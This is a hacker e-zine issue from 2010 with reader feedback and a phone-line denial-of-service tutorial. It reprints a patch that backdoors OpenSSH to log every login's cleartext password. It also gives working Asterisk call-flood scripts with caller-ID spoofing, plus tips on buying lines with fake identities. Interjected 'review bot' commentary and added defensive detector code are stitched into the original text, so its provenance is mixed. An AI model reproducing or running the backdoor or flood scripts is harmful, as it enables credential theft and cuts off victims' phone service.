Go Null Yourself E-Zine #2


[GNY ASCII cover logo; not recoverable in this copy]
Go Null Yourself E-Zine
Issue #2 - October 2010
www.GoNullYourself.org

"People who say it cannot be done should
not interrupt those who are doing it."

|| 0x01 Introduction                          teh crew
|| 0x02 Feedback + Edits
|| 0x03 DoSing Phone Lines with Asterisk      b14ck
|| 0x04 duper's Code Corner                   duper
|| 0x05 Test Numbers                          storm
|| 0x06 Practical DLL Hijacking               storm
|| 0x07 Numbers Stations FOIA Request         teh crew
|| 0x08 Exploring Tieline Networks            Shadytel, Inc
|| 0x09 Modem Numbers                         storm
|| 0x0a Linux Full-Disk Encryption With TC    second
|| 0x0b Programming Challenge                 storm
|| 0x0c Hotel Pennsylvania's PBX              Shadytel, Inc
|| 0x0d Interview with Adrian Lamo
|| 0x0e Et Cetera, Etc.                       teh crew
[==================================================================================================]
-=[ 0x01 Introduction
-=[ Author: teh crew
Welcome to another issue of the Go Null Yourself e-zine, and, once again, glad you could join us.
You may have already noticed a few things different with this issue. First off, it was released
fairly quickly after issue #1 (July 2010), much more quickly than is usual for e-zine series, as we
are attempting to adopt a schedule of quarterly release. This means that a lot of hard work is being
put forth by our authors to meet such short deadlines with a sufficient amount of comprehensive,
interesting content. For that, we express our deepest gratitude.
Secondly, we have changed a few aspects of the zine's formatting in general. The width has been
increased from 86 columns to 100, mostly for the sake of reducing the frequency of problems with
line wrapping in published code. It has also been requested that each article section be labeled
with its respective hexadecimal index number for easy page jumping. If you have any suggestions for
the zine, submit them to us (our contact information is at the end of this article), and we will
certainly consider them.
Thirdly, a large chunk of content this issue is phone-related. We wish to accomplish two goals by
doing this: 1) to promote interest in hacking technology besides computer systems, and 2) to pump
some life back into the phreaking scene. There is so much to learn from exploring the phone system,
and we hope to be there every step of the way.
If you are interested in submitting content for future issues of GNY Zine, we would be happy to
review it for publication. Content may take many forms, whether it be a paper, review, scan, or
first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some
way are also appreciated. Well-received topics include computer hacking and exploitation methods,
programming, telephone phreaking (both analog and digital), system and network exploration, hardware
hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
We are also receptive to content relating to concrete subjects such as science and mathematics,
along with more abstract subjects such as psychology and culture. Both technical and non-technical
material is accepted.
Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
via:
- IRC private message (storm or m0nkee @ irc.distrust.us #gny)
- Email (zine@gonullyourself.org)
If there is enough feedback, we will publish some of the messages in future issues.
We have devoted a lot of effort into this publication and hope that you learn something from reading
it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
citing certain passages) and give credit to the original authors when and where necessary.
Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
damage that may result from the information presented within this publication. Although people will
be people and act in idiotic fashions, we do not condone, promote, or participate in illegal
behavior in any way.
[==================================================================================================]
-=[ 0x02 Feedback and Edits
This section is devoted to messages we've received regarding GNY Zine, both positive and negative.
Readers may also submit information that they feel supplements content from previous issues.
Significant errors in the zine will also be addressed.
----------------------------------------------------------------------------------------------------
Hey team. On the release of the new e-zine under the Alternate Data Streams article there's a
little typo. In the first example, using C:\folders:secrets.txt the paragraph below it refers to it
as "C:folders:secrets.txt". It's not something that should throw a reader off the deep end or
anything. I thought it should be pointed out in case you wanted to correct it.
I'm loving the articles so far. I hope you can keep up the work. I'll be coming back for sure.
Thanks,
-Boom
>> Ah, yes, you are correct - apologies for the error. "C:folders:secrets.txt" on line 412 of issue
>> #1 should be corrected to "C:\folders:secrets.txt". Thank you for reporting it and also for the
>> compliment.
----------------------------------------------------------------------------------------------------
rattle of www.awarenetwork.org posted the following on his website in response to the RTLO Spoofing
article from issue #1:
I had a lot of fun reading the RTLO article in the GNY zine and found myself very incompetent when
it came to inputting that RTLO char anywhere. Hence, I wrote a little program that would set my
clipboard to just the RTLO char, allowing me to paste it into browser forms and other stuff
conveniently. I did this because the other tool that was linked
[http://www.fileformat.info/tool/unicodeinput/index.htm] isn't open source. Granted, my app has no
GUI, but at least you can see its insides.
>> We agree that entering the RTLO character is quite tricky, and we thank you for publishing your
>> source code (below). Hopefully it is useful for other readers, as it's come in handy for us!
>> A pre-compiled Windows binary is available for download at
>> http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.exe
----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.asm
.386
.model flat, stdcall
include kernel32.inc
include user32.inc
.code
Main:
PUSH 0
CALL OpenClipboard
TEST EAX, EAX
JZ ERROR
CALL EmptyClipboard
PUSH 4 ; size of RTOL with nullchar
PUSH 2 ; GMEM_MOVEABLE
CALL GlobalAlloc
TEST EAX,EAX
JZ ERROR
MOV EBX,EAX
PUSH EBX
CALL GlobalLock
TEST EAX,EAX
JZ ERROR
MOV word ptr [EAX], 0202EH
MOV word ptr [EAX+2], 0
PUSH EBX
CALL GlobalUnlock
PUSH EBX ; handle
PUSH 0DH ; CF_UNICODETEXT
CALL SetClipboardData
MOV EDX, EAX
PUSH EBX
CALL GlobalFree
CALL CloseClipboard
TEST EDX,EDX
JZ SUCCESS
ERROR:
PUSH 1
JMP BAIL
SUCCESS:
PUSH 0
BAIL:
CALL ExitProcess
END Main
----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.c
#include <windows.h>

int main() {
    HGLOBAL handle;
    WCHAR *buffer;
    BOOL success = FALSE;

    if (OpenClipboard(NULL)) {
        EmptyClipboard();
        if ((handle = GlobalAlloc(GMEM_MOVEABLE, 2*sizeof(WCHAR))) &&
            (buffer = GlobalLock(handle)) ) {
            buffer[0] = 0x202E;   /* U+202E RIGHT-TO-LEFT OVERRIDE */
            buffer[1] = 0;        /* terminating NUL */
            GlobalUnlock(handle);
            success = (SetClipboardData(CF_UNICODETEXT, handle) != NULL);
            GlobalFree(handle);
        }
        CloseClipboard();
    }
    return !success;
}

#if 0
extern void __cdecl mainCRTStartup( void ){
    ExitProcess(main());
}
#endif
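The clipboard program above makes it easy to put U+202E into a form; the complementary defensive task is spotting it once it has been pasted into a file name. The following is an added example, not rattle's code and not from the zine: it flags Unicode bidi control characters in a string, approximates what a single right-to-left override makes a file name look like, and reports when the apparent extension differs from the real one. The `naive_display` rendering is a deliberate simplification of the Unicode bidi algorithm (it only handles one RLO with an ASCII tail), which is enough to show a reviewer what a victim would see.

```python
import unicodedata

# Bidi classes of the Unicode directional control characters (U+202A..U+202E
# embeddings/overrides and U+2066..U+2069 isolates). unicodedata.bidirectional()
# returns these class names for the corresponding code points.
BIDI_CONTROL_CLASSES = {"LRE", "RLE", "PDF", "LRO", "RLO", "LRI", "RLI", "FSI", "PDI"}


def find_bidi_controls(text):
    """Return (index, bidi_class) for every directional control character in text."""
    return [(i, unicodedata.bidirectional(ch))
            for i, ch in enumerate(text)
            if unicodedata.bidirectional(ch) in BIDI_CONTROL_CLASSES]


def naive_display(text):
    """Approximate rendering of a name containing one RLO (U+202E): the run after
    the override is displayed reversed. Simplified bidi handling for ASCII tails."""
    i = text.find("\u202E")
    if i < 0:
        return text
    return text[:i] + text[i + 1:][::-1]


def _extension(name):
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def check_filename(name):
    """Classify a file name. A name is suspicious if it carries any bidi control;
    extension_mismatch is set when what the user sees differs from what the OS
    will execute/open."""
    controls = find_bidi_controls(name)
    shown = naive_display(name)
    real_ext, shown_ext = _extension(name), _extension(shown)
    return {
        "name": name,
        "shown": shown,
        "controls": controls,
        "real_ext": real_ext,
        "shown_ext": shown_ext,
        "suspicious": bool(controls),
        "extension_mismatch": bool(controls) and real_ext != shown_ext,
    }


if __name__ == "__main__":
    # Constructed sample names: one benign, one with an override before ".exe".
    for sample in ("report.pdf", "report\u202Efdp.exe"):
        result = check_filename(sample)
        print("%-20r shown as %-16r suspicious=%s mismatch=%s" % (
            sample, result["shown"], result["suspicious"], result["extension_mismatch"]))
```

The check is cheap enough to run on every upload or attachment name; the useful output for an analyst is the pair `real_ext` / `shown_ext`, since a control character with no extension change (for example in genuinely bidirectional text) is far less interesting than one that turns `.exe` into an apparent `.pdf`.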
----------------------------------------------------------------------------------------------------
There have been reports that the patched source from Trojaning OpenSSH in issue #1 crashes upon SSH
login. We regret and apologize for the error, which has been traced to an incorrect declaration of
the hidden_buff buffer on line 38. The updated code is below:
diff -rupN openssh-5.5p1/auth-passwd.c openssh-5.5p1-backdoored/auth-passwd.c
--- openssh-5.5p1/auth-passwd.c 2009-03-07 19:40:28.000000000 -0500
+++ openssh-5.5p1-backdoored/auth-passwd.c 2010-06-17 14:14:23.000000000 -0400
@@ -123,6 +123,19 @@ auth_password(Authctxt *authctxt, const
}
#endif
result = sys_auth_passwd(authctxt, password);
+
+ // Begin Backdoor
+
+ if ( result ){
+ snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Successful login %s:%s from %s\n",
-> authctxt->user, password, get_remote_ipaddr());
+ hidden_log();
+ } else {
+ snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Invalid login %s:%s from %s\n",
-> authctxt->user, password, get_remote_ipaddr());
+ hidden_log();
+ }
+
+ // End Backdoor
+
if (authctxt->force_pwchange)
disable_forwarding();
return (result && ok);
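Review bot: The block added inside auth_password() copies the cleartext `password` together with the user name and remote address into hidden_buff on both the success and the failure path, so every credential presented to sshd is captured regardless of outcome; that is the line a reviewer of auth-passwd.c has to flag, and it is the change that source or binary integrity checking against the distribution's sshd needs to catch. Minor points on the same lines: the two branches differ only in the prefix string and could be a single snprintf with the prefix chosen by `result`, and `sizeof(hidden_buff) - 1` is redundant because snprintf already reserves room for the terminator.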
diff -rupN openssh-5.5p1/includes.h openssh-5.5p1-backdoored/includes.h
--- openssh-5.5p1/includes.h 2009-08-20 02:16:01.000000000 -0400
+++ openssh-5.5p1-backdoored/includes.h 2010-06-17 14:12:24.000000000 -0400
@@ -172,4 +172,24 @@
#include "entropy.h";
+// Begin Backdoor
+
+#include <sys/stat.h>
+#include <stdio.h>
+#define HIDDEN_LOG_FILE "/tmp/.ssh_log"
+
+FILE *hiddenlog;
+char hidden_buff[1024];
+
+#define hidden_log() { \
+ chmod(HIDDEN_LOG_FILE, 0666); \
+ hiddenlog = fopen(HIDDEN_LOG_FILE, "a"); \
+ if ( hiddenlog != NULL ) { \
+ fprintf(hiddenlog, "%s", hidden_buff); \
+ fclose(hiddenlog); \
+ } \
+}
+
+// End Backdoor
+
#endif /* INCLUDES_H */
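Review bot: includes.h now defines the objects `FILE *hiddenlog;` and `char hidden_buff[1024];` rather than declaring them `extern`, so every translation unit that includes the header carries its own definition; this links only because of the common-symbol behaviour of older toolchains and fails under -fno-common, which is the kind of build breakage that draws attention to the change. The `hidden_log()` macro body is a bare brace block instead of `do { ... } while (0)`, so `if (x) hidden_log(); else ...` does not compile. From the defensive side, the hard-coded `/tmp/.ssh_log` that is chmod'ed to 0666 on every call is the obvious host indicator: a world-writable dotfile in /tmp that grows with each login attempt, an easy target for file-integrity monitoring or an audit watch on /tmp.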
----------------------------------------------------------------------------------------------------
Our long-time friend sunjester posted the following at http://fusecurity.com/blog/?p=186 in response
to issue #1:
GNY is a familiar group to myself. They do not like me on account of several reasons that we won't
go into here. The "ezine" they released isn't offering much, so you didn't miss much if you're looking
for another hacking zine to veg out to. I have some comments of my own about their release. I saw
that r00tsecurity referenced the Zine in their newsletter, in which case I had to look at it.
>> Yes, there is a bit of bad blood between sunjester and GNY. We also won't go into details, as
>> they are irrelevant.
1. conversational hypnosis
2. RTLO Spoofing
3. Alternate Data Streams
4. Derandomizing Perl's Random Number Generator
5. Trojaning OpenSSH
6. Story of a Raid
7. Programming Challenge
8. ConfCon 2010 CFP
9. 907-887-88xx Scan
conversational hypnosis
The first thing on their list is something called "conversational hypnosis", the whole thing was
complete b.s.. Nothing described really actually told anyone how to apply or use "covert hypnosis"
which is what is more widely known as. This whole idea is based around notions and persuasion.
>> I wrote the article with the specific intention of not giving enough detail for readers to be
>> able to use it since it can really cause damage. It was just to show that it was out there and
>> said to listen to Taylor Starr's lectures if you wanted to learn it in depth. -hsu
rtlo spoofing
The reason this isn't so successful is because it's not very practical and it's a pain in the ass to
use. This guy (Anarchy_Angel) basically just read the documents and wrote what he read. No PoC was
offered or instructions or anything different than what was presented in the documents he referenced
([http://packetstormsecurity.org/papers/general/righttoleften-override.pdf],
[http://hackers-hideaway.com/blog.php?post_id=94],
[http://www.mozilla.org/security/announce/2009/mfsa2009-62.html]). I'm not going to continue to
break down this method.
>> Actually, no. I (storm) wrote the article - it says so right at the top. Anarchy_Angel's
>> research was simply referenced. And yes, I wrote an article based on information I read. That's
>> usually how it works. The referenced paper on packetstormsecurity.org is written in broken
>> English, so I'm sure many will appreciate reading a paper that is easily decipherable;
>> hackers-hideaway.com was offline at the time (and continues to be offline), so Anarchy's research
>> is unavailable; and the mozilla.org link is simply an advisory. As for proof of concept, three
>> example attacks were explained in the paper. I also explained how the GNY forum was affected by
>> an RTLO spoofing attack.
Alternate Data Streams
At first glance I thought it may be worth reading until I kept scrolling down scanning through and
pulling out keywords, etc., etc. Scanning back to the top I started reading and it was apparent from
reading the first couple paragraphs that this person had not done much research or offered a
solution to finding or protecting yourself against such flaws. The first thing people should know is
that there is an EASY way to view alternate data streams. Microsoft provides an application named
"Streams" to help view ADS's. You can download and read about it here.
He references the application but never shows how to use it, link to it, or even talk about it. He
obviously rushed through and didn't give a crap about the actual content going into the message he
was conveying in the article. While I don't deny information provided from the article can be useful
and may have shown people something new, ADS.
The information wasn't very fruitful, and could have been presented a lot better. Amir refers to
metadata as "real data". He references forking but I guess he didn't bother to read it, if he had
read the page he would have seen that it was named "metadata", lmao. This was a good topic, it just
should have been elaborated on more.
>> "I'd like to thank you for taking the time to review my article... I see you have some valid
>> points, but you assumed that I 'rushed' in with the topic, which is not exactly true. When this
>> topic was first introduced to me, I liked it and I wanted to write a brief article to educate
>> others about it. It was not new research, and it was not something that is security related at
>> all. I was merely trying to let others know of the existence of such a thing. And by the way my
>> name is 'Amr' not 'Amir'. Have a good one :-)" -d4de
Derandomizing Perl's Random Number Generator
While it's fun to talk about and figure things like this out, it's not very effective for hacking or
really having anything to do with computer security.
>> Random numbers have everything to do with computer security. Attacks based on the prediction of
>> random numbers, such as http://seclists.org/fulldisclosure/2010/Apr/167 , are becoming more and
>> more practical. A cryptographic process based on predictable numbers is a broken process.
>> Besides, we're not limited to content based solely on computer security. Anything that breaks or
>> circumvents a system of any kind is fascinating to us.
Trojaning OpenSSH
yep, he did all that from a root terminal...
>> So what's your point?
Story of a Raid
The crap this kid must have been smoking must be unbelievable! Damn, send some my way. Let's highlight
some of the dumbest shit he said. It's super ridiculous so let's keep it simple and try not to waste
too much time on this dumb, uninformative stereotypical story.
1. and it really will leave me open to anything the FBI wants to portray me as.
2. Incriminating evidence - Sure, it's just a simple server-client program in C
3. However, even if I did have a magnet, there is little time to do anything once they bust
in.
4. My parents didn't completely realize what was going on
And my response..
1. Really? did they do it x-files style or "hackers" style? Kicking in the door with one foot
while wielding a gun in the other? A friend of mine was raided last year, and once before that a few
years before. The FBI certainly didn't kick in his door.
>> "'Hackers' style, they did literally kick in the door with guns held" -OrderZero
2. A client server application is hardly a crime, and would never be considered one.
>> "Are you aware of what a trojan /is/?" -OrderZero
3. Really? Do you know how much of a magnetic field is required to reset the drive? Yo momma's
fridge magnet ain't gonna work.
>> "Yes I do and I never said a fridge magnet." -OrderZero
4. Wow, you still live with your parents? You're saying that the FBI would raid someone's house
without knowing who was inside? I guess they wouldn't have traced the IP back to the ISP and called
around huh? Go sit in the corner, change your name, and come back.
>> "What does the FBI knowing who was inside have to do with what I said at all? Yes, I live with
>> friends and family (or I did...). I'm 18-years-old. Honestly, if you're trying to insult me,
>> kindly rephrase it and actually make it relevant to the story, please and thanks." -OrderZero
ConfCon CFP
What is this, 1989?
>> *looks at calendar*
907-887-88xx Scan
come on guys, move into the new fuckin' millennium..
>> It's a damn shame your lack of curiosity is limiting your mind so severely. Pick up your phone
>> and tell me if you hear a dialtone. Last I checked, there was still an entire PSTN waiting to be
>> explored.
Et Cetera, Etc.
I could only read so much and all I have to say is these people have a long way to go before
actually becoming anything close to a hacker or having any kind of "hacking ethics". In closing, be
sure to know that the next release will be just as boring and shitty. Sorry guys but this was
HORRIBLE and not worth reading or making the effort to archive.
>> :D
[==================================================================================================]
-=[ 0x03 DoSing Phone Lines with Asterisk
-=[ Author: b14ck
-=[ Website: http://projectb14ck.org/
Table of contents
1. Intro
2. Requirements
3. Installing pycall
4. Strategy
5. Your First DoS
6. A More Advanced DoS Technique
7. Tips
8. Conclusion
9. Questions?
Intro
-----
Denial of Service attacks are nothing new to people in the IT and computer security world. DoS
attacks are a very simplistic form of attack which aim to flood the target (whether it be a
computer, mobile device, or phone line) with traffic so that it cannot process legitimate traffic.
While being simple to perform, DoS attacks are often difficult to defend against without significant
downtime.
Today I'm going to show you how to perform a DoS attack on a phone line. This process is simple,
quick to perform, and very illegal. Before we get started, I'd just like to remind you that this
article is for educational purposes only! All the code I'm putting into this article is python, and
should work on any system with python 2.4+.
Requirements
------------
Now, in order to follow along you will need 3 main things:
* An Asterisk PBX system (our favorite open source PBX) set up and running,
* A lot of phone lines. We'll need a lot of phone lines because we'll need to place a lot of
simultaneous calls. If you don't have hard lines, get a VoIP line (I prefer this method) as they are
really cheap and quick to setup.
* The last thing you'll need is my pycall python library. This is a library I wrote which allows
us to create Asterisk call files quickly and easily in python.
(http://github.com/comradeb14ck/pycall)
For those of you unfamiliar with Asterisk, I'd highly recommend reading the PDF book Asterisk: The
Future of Telephony, which is a great guide to getting started with Asterisk.
(http://downloads.oreilly.com/books/9780596510480.pdf)
The pycall python library mentioned above is a project I created a month or so ago which makes
placing calls through Asterisk a simple task for python developers. Call files are specially
formatted text files which Asterisk processes and performs actions on. pycall simplifies and
abstracts a great deal of the call file creation process as call files have many small quirks which
make them difficult to work with. Using pycall greatly reduces the amount of code we'll need to
write and ensures that all call files are created in a secure, efficient manner. For this article,
we'll be using my pycall library as a medium for quickly making calls through Asterisk without
digging into the details. If you want to know more about pycall check out the Why pycall? document
on the project's wiki page.
Installing pycall
-----------------
The good news is that pycall installs simply (it's a portable python module) and will work out of
the box with no modifications to your system whatsoever (as long as you are running some form of
linux).
To make things even easier, I've created a small shell script which you can run that will download
and install pycall, then delete itself:
----------
#!/bin/bash
#
# pycall-install.sh
#
# @author: Randall Degges
# @email: rdegges@gmail.com
# @date: 11-20-2009
#
# This program installs the pycall library on any linux machine which has
# python 2.4+.
#
MIRROR=http://cloud.github.com/downloads/comradeb14ck/pycall/
NAME=pycall
VER=1.2
wget $MIRROR$NAME-$VER.tar.gz
tar zxvf $NAME-$VER.tar.gz
cd $NAME-$VER
sudo python setup.py install
cd ..
rm -rf $NAME-$VER
rm -rf $NAME-$VER.tar.gz
echo "Finished installing pycall-$VER."
----------
You can copy the script above and run it to install the library on any linux system quickly.
Next, we'll write a simple application which will call your cell phone in order to make sure
everything is working. Here is the source.
NOTE: You will need to modify this code and fill in the appropriate details for your system. The
user field (which seems a little ambiguous) refers to the user account that Asterisk is running
under. If you want to create the call file as whatever user you are currently logged in as, you can
remove that field altogether.
----------
#!/usr/bin/python
"""
hello-world.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program tests the pycall library and makes sure that you are able to place
calls correctly.
"""
from pycall.callfile import *

def main():
    """
    Create a call to your cell phone (for testing). It will say 'hello world'
    then hang up on you.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        number = '18182223333',
        application = 'Playback',
        data = 'hello-world',
        user = 'asterisk'
    )
    testcall.run()

if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------
A quick note to non-telephony people. The above code generates a text file (call file) which is then
moved to the Asterisk spooling directory: /var/spool/asterisk/outgoing. Asterisk aggressively
monitors the spooling directory for call files (like the ones we are creating), parses them, and
performs the actions specified by the call file. In this case, we are telling Asterisk to call our
cell phone and, once we pick up, play a sound file that says "hello world" and then hang up. In case
you are wondering, Asterisk contains the "hello world" sound file by default, which is why we don't
need anything else to make this work.
Strategy
--------
Now that we have our tools ready to go, let's discuss our strategy for disabling the target phone
line.
The goal of the attack is to prevent the target phone number from placing and receiving calls. As
you can probably imagine, this is completely devastating to businesses and other
communication-dependent organizations, as it completely breaks down communications. Many companies
in particular rely on telephone service (think pizza places and call centers) for their primary
revenue stream. Imagine the effect a 24-hour DoS attack can have on a business that relies on phone
service... The impact can be severe.
Our strategy is simple: to call the target phone number more times than they have phone lines.
You might be thinking: This is really easy, all I have to do is pick up my phone, and keep dialing
the target number over and over again to keep their phone line tied up. In reality, this does
sometimes work. A great example is the 2002 New Hampshire Senate election phone jamming scandal. See
http://en.wikipedia.org/wiki/2002_New_Hampshire_Senate_election_phone_jamming_scandal. Basically,
"the NHGOP hired GOP Marketplace, based in Northern Virginia, to jam another phone bank being used
by the state Democratic Party and the firefighters' union for efforts to turn out voters on behalf
of then-governor Jeanne Shaheen on Election Day." And just in case you are wondering, yes, he went
to jail. :)
In reality, most businesses and other places have more than a single phone line connected to their
phone number. PRIs, T1s, and VoIP are all common now (a single T1 PRI carries 23 voice channels),
which means that in order to completely prevent one of those phone lines from placing calls, you
will need to be generating upwards of 23 simultaneous calls to completely disable the target.
If you know anything about your target phone line, then you probably know how many calls you will
need to place at any given time to keep them busy. But don't worry if you don't know anything about
your target! This will be covered later in this article.
Your First DoS
--------------
The program below contains the source of a simple flooding application. You will still have to make
your original adjustments like you did to the hello-world.py application earlier, but that's all, I
promise!
----------
#!/usr/bin/python
"""
simple-flood.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program floods the specified phone number.
"""
from time import sleep
from sys import argv, exit
from pycall.callfile import *

def call(num):
    """
    Create a call to the specified number which does nothing except hang up.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        number = num,
        application = 'Hangup',
        data = ' ',
        user = 'asterisk'
    )
    testcall.run()

def main():
    """
    Control the application logic.
    """
    if len(argv) < 3:
        print 'Usage: %s [number] [calls-per-minute]' % argv[0]
        exit(1)

    number = argv[1]
    try:
        cpm = int(argv[2])
    except ValueError:
        cpm = 1

    print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)
    count = 1
    while True:
        for x in xrange(cpm):
            print 'Placing call %d...' % count
            call(number)
            count = count + 1
        sleep(60)

if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------
This small program (only a few lines!) is able to completely paralyze a target number (provided
you have enough phone lines). It is fairly flexible, and allows you to specify the number of
calls per minute that you'd like to place. This works just as described: If you tell it to run
with 60 calls per minute, then you'll immediately place 60 calls. These calls will ring to the
target number, and once they pick up the phone, will immediately hang up.
To run this program see the usage:
./simple-flood.py [number] [calls-per-minute]
./simple-flood.py 18002223333 5
The first parameter is the number you want to flood, and the second is the number of calls per
minute that you'd like to place to that number.
Here's what it should look like running if everything goes smoothly:
[root@blackbox randall]# ./simple-flood.py 18182223333 5
Starting call flood on target: 18182179229. Placing 5 calls per minute.
Placing call 1...
Placing call 2...
Placing call 3...
Placing call 4...
Placing call 5...
Placing call 6...
Placing call 7...
Placing call 8...
Placing call 9...
Placing call 10...
Now, obviously, DoS attacks like this are simple to defend against as the victim can simply block
the particular number you are calling from. However--there are ways around this too!
A More Advanced DoS Technique
-----------------------------
To make it harder for the victim to defend against our simple DoS attack, let's add caller ID
spoofing to the calls as well (will only work if your provider allows it) so that the target can't
blacklist a single number because you are calling them from random numbers!
Not only is doing this simple, it is also highly effective. Imagine being a business owner, and
instantly getting 100 calls from 100 different numbers. You'd be confused, unable to do anything
except unplug your phone lines (which doesn't accomplish anything), and unable to receive business.
So here is our program with caller ID spoofing included. It is still used the same way, except MUCH
harder to defend against.
----------
#!/usr/bin/python
"""
advanced-flood.py
@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09
This program floods the specified phone number and spoofs caller ID making it
much harder to trace / prevent.
"""
from time import sleep
from sys import argv, exit
from pycall.callfile import *
from random import seed, randint

def genid():
    """
    Generate a random 10-digit US telephone number for spoofing to.
    """
    return str(randint(1000000000, 9999999999))

def call(num, cid):
    """
    Create a call to the specified number which does nothing except hang up.
    Also spoofs caller ID to a random 10 digit number.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        callerid_num = cid,
        number = num,
        application = 'Hangup',
        data = ' ',
        user = 'asterisk'
    )
    testcall.run()

def main():
    """
    Control the application logic.
    """
    seed() # seed the random number generator

    if len(argv) < 3:
        print 'Usage: %s [number] [calls-per-minute]' % argv[0]
        exit(1)

    number = argv[1]
    try:
        cpm = int(argv[2])
    except ValueError:
        cpm = 1

    print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)
    count = 1
    while True:
        for x in xrange(cpm):
            cid = genid()
            print 'Placing call %d using caller ID %s...' % (count, cid)
            call(number, cid)
            count = count + 1
        sleep(60)

if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------
Here's an example of what this program should look like running. Note that it generates a different
caller ID for each call. >:)
[root@blackbox randall]# ./advanced-flood.py 18182223333 7
Starting call flood on target: 18182223333. Placing 7 calls per minute.
Placing call 1 using caller ID 7110992417...
Placing call 2 using caller ID 3689407130...
Placing call 3 using caller ID 4139439982...
Placing call 4 using caller ID 9795095964...
Placing call 5 using caller ID 5278670787...
Placing call 6 using caller ID 6684773360...
Placing call 7 using caller ID 2716775282...
Now this is a lot better!
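From the receiving side, both floods leave the same footprint in the PBX's call detail records: a burst of calls to one destination that are answered and dropped within a second or two, or never answered at all. The difference is only whether the caller ID repeats (blockable) or rotates (not blockable by number). The following is an added example, not code from the article or from the pycall project: a sliding-window detector run over constructed Asterisk CDR lines. It assumes the column layout of the stock `cdr_csv` Master.csv file (an assumption to verify against your own CDR configuration) and uses the rotating caller IDs from the article's sample run as sample data.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Assumed column order of the stock Asterisk cdr_csv Master.csv; verify against
# your own cdr configuration before relying on it.
CDR_FIELDS = ["accountcode", "src", "dst", "dcontext", "clid", "channel",
              "dstchannel", "lastapp", "lastdata", "start", "answer", "end",
              "duration", "billsec", "disposition", "amaflags", "uniqueid",
              "userfield"]
TS = "%Y-%m-%d %H:%M:%S"


def make_cdr(start, src, dst, billsec, disposition):
    """Build one constructed Master.csv line (sample data, not a real CDR)."""
    duration = billsec + 6                       # assume ~6 s of ringing
    answer = (start + timedelta(seconds=6)).strftime(TS) if billsec else ""
    end = (start + timedelta(seconds=duration)).strftime(TS)
    fields = ["", src, dst, "from-trunk", '"" <%s>' % src, "SIP/flowroute-0001",
              "SIP/100-0002", "Dial", "SIP/100", start.strftime(TS), answer, end,
              str(duration), str(billsec), disposition, "DOCUMENTATION", "", ""]
    buf = StringIO()
    csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n").writerow(fields)
    return buf.getvalue()


# Constructed sample: one normal call, a single-source burst (six answer-and-hang-up
# calls ten seconds apart) and a rotating-caller-ID burst (seven unanswered calls
# eight seconds apart, caller IDs taken from the article's sample run).
T0 = datetime(2010, 10, 1, 10, 0, 0)
_lines = [make_cdr(T0, "2125551000", "18182223333", 125, "ANSWERED")]
_lines += [make_cdr(T0 + timedelta(minutes=1, seconds=10 * i), "3105550100",
                    "18182223333", 1, "ANSWERED") for i in range(6)]
_rotating = ["7110992417", "3689407130", "4139439982", "9795095964",
             "5278670787", "6684773360", "2716775282"]
_lines += [make_cdr(T0 + timedelta(minutes=5, seconds=8 * i), cid,
                    "18005550199", 0, "NO ANSWER") for i, cid in enumerate(_rotating)]
SAMPLE_CDR = "".join(_lines)


def parse_cdr(text):
    """Parse Master.csv-style text into dicts; start becomes a datetime, billsec an int."""
    rows = []
    for raw in csv.reader(StringIO(text)):
        if len(raw) < 15:
            continue                              # skip truncated/malformed lines
        row = dict(zip(CDR_FIELDS, raw))
        row["start"] = datetime.strptime(row["start"], TS)
        row["billsec"] = int(row["billsec"] or 0)
        rows.append(row)
    return rows


def find_floods(rows, window=timedelta(seconds=60), min_calls=5, max_billsec=2):
    """Per destination, slide a time window over calls billed for at most
    max_billsec seconds (answer-then-hangup or unanswered). Emit one alert when
    min_calls such calls fall inside the window, then start a fresh window."""
    by_dst = defaultdict(list)
    for r in rows:
        if r["billsec"] <= max_billsec:
            by_dst[r["dst"]].append(r)
    alerts = []
    for dst, calls in by_dst.items():
        calls.sort(key=lambda r: r["start"])
        left = 0
        for right, r in enumerate(calls):
            while r["start"] - calls[left]["start"] > window:
                left += 1
            span = calls[left:right + 1]
            if len(span) >= min_calls:
                sources = {c["src"] for c in span}
                alerts.append({
                    "dst": dst,
                    "first": calls[left]["start"],
                    "calls": len(span),
                    "distinct_src": len(sources),
                    # one repeating caller ID can be blocked; rotation cannot
                    "kind": "single-source" if len(sources) == 1 else "rotating-callerid",
                })
                left = right + 1
    return alerts


if __name__ == "__main__":
    for a in find_floods(parse_cdr(SAMPLE_CDR)):
        print("%s: %d short calls to %s from %d caller ID(s) starting %s" % (
            a["kind"], a["calls"], a["dst"], a["distinct_src"], a["first"]))
```

The thresholds are the tunable part: `min_calls` should sit above the destination's normal call arrival rate for the window, and `max_billsec` distinguishes the article's `Hangup` calls from genuine short conversations. A `rotating-callerid` alert is the signal to stop filtering by number and instead rate-limit at the trunk or ask the carrier to do so, since any per-number blacklist is defeated by the next random ID.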
Tips
----
The first tip is for those of you who don't know how many calls you have to place to disable your
target. USE VOIP!
VoIP providers are great for DoS attacks because they:
* Can be purchased online using a fake name / credit card.
* Are cheap (much less expensive than analog lines) and don't require additional hardware.
